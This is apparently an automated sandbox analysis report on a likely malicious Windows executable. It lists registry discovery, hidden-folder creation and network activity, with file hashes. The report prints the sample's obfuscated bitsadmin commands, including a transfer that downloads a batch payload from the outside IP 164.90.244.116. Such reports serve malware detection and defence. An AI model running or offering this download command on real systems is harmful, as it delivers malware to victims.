Analysis Overview
SHA256
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
Threat Level: Likely malicious
The file ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe was found to be: Likely malicious.
Malicious Activity Summary
Download via BitsAdmin
Checks computer location settings
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 02:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 02:12
Reported
2024-08-06 02:15
Platform
win7-20240704-en
Max time kernel
14s
Max time network
18s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
"C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t3935.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
C:\Windows\SysWOW64\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /crEaTe pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /ResUme pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /CompLete pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
Network
| Country | Destination | Domain | Proto |
| US | 164.90.244.116:80 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\ytmp\t3935.bat
| MD5 | 3baa57d1131417b71e8d0bfb45f46ec3 |
| SHA1 | 8443f01dc35d643cf2071c2dd90787d972de64f7 |
| SHA256 | 5911b623c6db07db3193f1ea5f9ba561c04292ec9acabf4586469aa0c77058c8 |
| SHA512 | 0563c9ad298a7f85880afd0f40867a6a67e13bc5a1b5c230f8545b8ba1dc896927b8eb34a54ad7880bd8d43f7108a2ede2710dcfdbf55abd9b22b0b4ef958024 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-06 02:12
Reported
2024-08-06 02:15
Platform
win10v2004-20240802-en
Max time kernel
125s
Max time network
131s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
"C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t14845.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
C:\Windows\SysWOW64\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /crEaTe pls
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4328,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /ResUme pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /CompLete pls
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c ""Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
Bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 164.90.244.116:80 | tcp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\ytmp\t14845.bat
| MD5 | d813dcd73594622bd3f1deefd3661175 |
| SHA1 | 5fe85bc7dde7c19f166452641d889ff48f70022d |
| SHA256 | 3d73776fc4c2cd443e448831a16646c779a9f24f2b1c299d9eb41e2f928f445b |
| SHA512 | 347bef14d9e32f00265c72ef10b8da733a2486ac8567198123f40dbcd953cb1dd6dc171bbea2c3aae270c8eafe112ec9913186f23cb91ef29c74f37d7946aa80 |